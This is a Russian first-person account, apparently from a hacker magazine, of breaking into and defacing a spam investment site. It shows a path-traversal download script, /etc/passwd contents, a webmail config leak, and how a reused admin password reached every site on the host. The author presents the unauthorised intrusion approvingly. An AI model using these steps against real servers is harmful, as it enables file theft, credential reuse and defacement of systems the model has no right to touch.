Как и многие другие пользователи инета, я тоже плачу (с ударением на второй
слог) за входящий трафик, тоже громко матерюсь когда забираю своим Батом 3-4
метра почты в день из которой процентов 90 оказывается навязчивой рекламой. Есть
разные способы борьбы со спамом, но наш рассказ будет не о них, а о дефейсе
сайта спамеров. Собственно с дефейсами сайтов я завязал еще лет 5 назад, так как
потерял интерес к этому действу, тем более что чужие сайты всегда можно
использовать для более интересных дел, сами знаете каких. Но тут был совершенно
другой случай и я решил вспомнить молодость...
Очередной раз забирая почту и удаляя из папки входящие все рекламные письма,
прорвавшиеся сквозь спам-фильтры, я обнаружил очередное предложение от
инвестиционной фирмы «прибыльно» вложить свои кровные на их сайте.
Имея большой опыт потрошенения баз инвесторок я кликнул по ссылке и стал
изучать сайт возжелавших «обогатить» меня дельцов. Сайт был на php и ничем
особым не выделялся из множества других. Исключением было только одно - для
авторизации пользователя по логину и паролю требовалось введение секретного
ключа, который должен был генериться соответствующей программой, любезно
предоставляемой для скачивания на сайте. Но меня заинтересовала не столько
программа генерирования секретного ключа, сколько параметры скрипта ее скачки:
http://www.cashe***.com/down.php?filename=CryptoKey.exe
Подставив вместо CryptoKey.exe имя скрипта down.php, я обнаружил у себя в
папке Download его исходники:
<?php
$filename = $_SERVER["DOCUMENT_ROOT"].'/'.$_GET['filename'];
// required for IE, otherwise Content-disposition is ignored
if(ini_get('zlib.output_compression')) {
ini_set('zlib.output_compression', 'Off');
}
header("Pragma: public"); // required
header("Expires: 0");
header("Cache-Control: must-revalidate, post-check=0, pre-check=0");
header("Cache-Control: private",false); // required for certain browsers
header("Content-Type: application/octet-stream");
header("Content-Disposition: attachment; filename=" . basename($filename) . ";");
header("Content-Transfer-Encoding: binary");
header("Content-Length: " . filesize($filename));
readfile($filename);
echo $filename;
?>
Как ты видишь, «мощный программист» позволил нам выкачивать с
сервера любой файл к которому мы знаем путь и имеем права на доступ.
Оставалось найти конфигурационный файл сайта и можно было бы попробовать
приконнектиться к фтп. Но скачивая по очереди файлы с сайта я обнаружил, что ни
конфигурационного файла, ни админки нет, а данные пользователя пересылаются на
мыло админа:
//sendmail($Email);
file_get_contents("http://cashe***-robot.com/mail.php?email=$Email");
а сама система авторизации чистый фейк, в котором главная роль принадлежит файлу
CryptoKey.exe – являющемуся, судя по всему, трояном.
Желание наказать хитрозадых спамеров усилилось. Но из читалки файлов много не
вытянешь. Скачав /etc/passwd (shadow естественно был недоступен) я увидел еще
несколько учетных записей, относящихся, скорее всего к другим сайтам:
admin:x:501:503::/home/admin:/bin/bash
stopspywar:x:503:505::/home/stopspywar:/bin/false
trendmicr2:x:504:506::/home/trendmicr2:/bin/false
trendmicro:x:505:507::/home/trendmicro:/bin/false
metatrader:x:506:508::/home/metatrader:/bin/bash
hvndias:x:507:509::/home/hvndias:/bin/false
scada:x:508:510::/home/scada:/bin/false
casheq:x:509:511::/home/casheq:/bin/false
Возникла мысль проверить их на reverse IP, но это ничего не дало. Полный путь до
других сайтов я не знал, так как нужно было знать их урлы:
/home/casheq/domains/cashe***.com/public_html/ - так выглядел путь к сайту
спамеров, его мне любезно предоставил скрипт down.php в сообщении об ошибке:
<b>Warning</b>: filesize() [<a href='function.filesize'>function.filesize</a>]:
Stat failed for /home/casheq/domains/casheq.com/public_html/../../../../etc/passwd
(errno=2 - No such file or directory) in <b>/home/casheq/domains/cashe***.com/public_html/down.php</b>
on line <b>14</b><br />
Ладно, "мы пойдем другим путем" подумал я, невольно повторив про себя слова вождя
мирового пролетариата. Бродя по сайту я мучительно думал - ну не могли
же они установить на нем только фейк для сбора данных и протроянивания
доверчивых юзеров. Должно быть еще что-то, ну они же спамеры. И тут мелькнула
мысль - webmail!!! Набираю в браузере http://www.cashe***.com/webmail/ и мне
предлагают проверить почту, естественно введя существующий логин и пароль. Это
уже кое-что. Пробую проверить webmail на наличие директории inc и мне любезно
предоставляется список файлов.
Естественно, внимание сразу же привлекает файл config.php, пробую его скачать, но
судя по всему путь к нему другой. Тогда открываю в браузере другие файлы
директории inc и вижу путь:
/var/www/html/webmail/inc/config.security.php
Сливаю config.php, получаю пароль и логин. К фтп он не подходит. Остается
попробовать этот же пароль к другим сайтам этого хостера, но урлов я не знаю.
Все попытки найти конфигурационный файл Apache httpd.conf закончились ничем.
Тогда я стал методично скачивать и анализировать скрипты webmail’а. И в одном из
них обнаружилась ссылка:
$domain = "localhost";
$arrUserfile = file("/etc/virtual/domainowners");
в которой были перечислены все сайты данного хостинга.
Оставалось прочекать сайты на доступ с известным мне паролем и логинами из
passwd, что я и сделал. Пароль подошел к учетной записи admin, имевшей доступ ко
всем другим сайтам этого хостера. И через минуту на главной странице http://www.cashe***.com
красовалась надпись: «СПАМЕРЫ – СУКИ!». Через час сайт перестал откликаться на
запросы и до сегодняшнего дня все еще недоступен.